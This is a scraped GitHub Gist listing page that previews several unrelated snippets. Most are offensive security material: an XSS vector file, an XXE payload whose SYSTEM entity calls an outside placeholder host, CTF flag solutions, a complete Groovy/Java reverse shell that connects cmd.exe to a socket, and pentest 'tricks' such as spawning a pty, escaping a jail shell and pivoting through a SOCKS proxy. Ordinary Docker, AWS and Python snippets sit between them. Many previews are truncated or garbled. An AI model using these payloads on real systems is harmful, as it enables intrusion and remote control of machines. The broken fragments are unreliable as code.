Skip to content

Instantly share code, notes, and snippets.

JohannesHoppe / 666_lines_of_XSS_vectors.html
Created May 20, 2013
666 lines of XSS vectors, suitable for attacking an API copied from
View 666_lines_of_XSS_vectors.html
<img src=1 href=1 onerror="javascript:alert(1)"></img>
evanscottgray /
Last active Nov 25, 2021
kill all docker containers at once...
docker ps | awk {' print $1 '} | tail -n+2 > tmp.txt; for line in $(cat tmp.txt); do docker kill $line; done; rm tmp.txt
chanj / AWS Security Resources
Last active Jun 21, 2021
AWS Security Resources
View AWS Security Resources
I get asked regularly for good resources on AWS security. This gist collects some of these resources (docs, blogs, talks, open source tools, etc.). Feel free to suggest and contribute.
Short Link:
Official AWS Security Resources
* Security Blog -
* Security Advisories -
* Security Whitepaper (AWS Security Processes/Practices) -
* Security Best Practices Whitepaper -
View XXE_payloads
Vanilla, used to verify outbound xxe or blind xxe
<?xml version="1.0" ?>
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
View CTF_Solutions.txt
## Level 1:
View the source, at the top we see:
<!-- infosec_flagis_welcome -->
Level 1 PASS: infosec_flagis_welcome
frohoff / revsh.groovy
Created Mar 2, 2016
Pure Groovy/Java Reverse Shell
View revsh.groovy
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(;while(pe.available()>0)so.write(;while(si.available()>0)po.write(;so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
0xBADCA7 /
Created Aug 27, 2016
Async HTTP requests in Python
from concurrent.futures import ThreadPoolExecutor
from requests_futures.sessions import FuturesSession
def outp(response):
urls = [
waywardsun / tricks
Created Sep 20, 2016 — forked from sckalath/tricks
View tricks
#get a pty through python
python -c 'import pty; pty.spawn("/bin/bash");'
#grab the user agent from the http header on port 10443
tcpdump -A -l -vvvs 1024 -npi eth0 port 10443
#base64 decode a string
echo STRINGTODECODE | base64 --decode
#escape jail shell
waywardsun / ssh_tricks
Created Sep 20, 2016 — forked from sckalath/ssh_tricks
ssh kung fu
View ssh_tricks
##SOCKS Proxy##
#Set up a SOCKS proxy on that lets you pivot through the remote host (
#Command line:
ssh -D
#You can then use tsocks or similar to use non-SOCKS-aware tools on hosts accessible from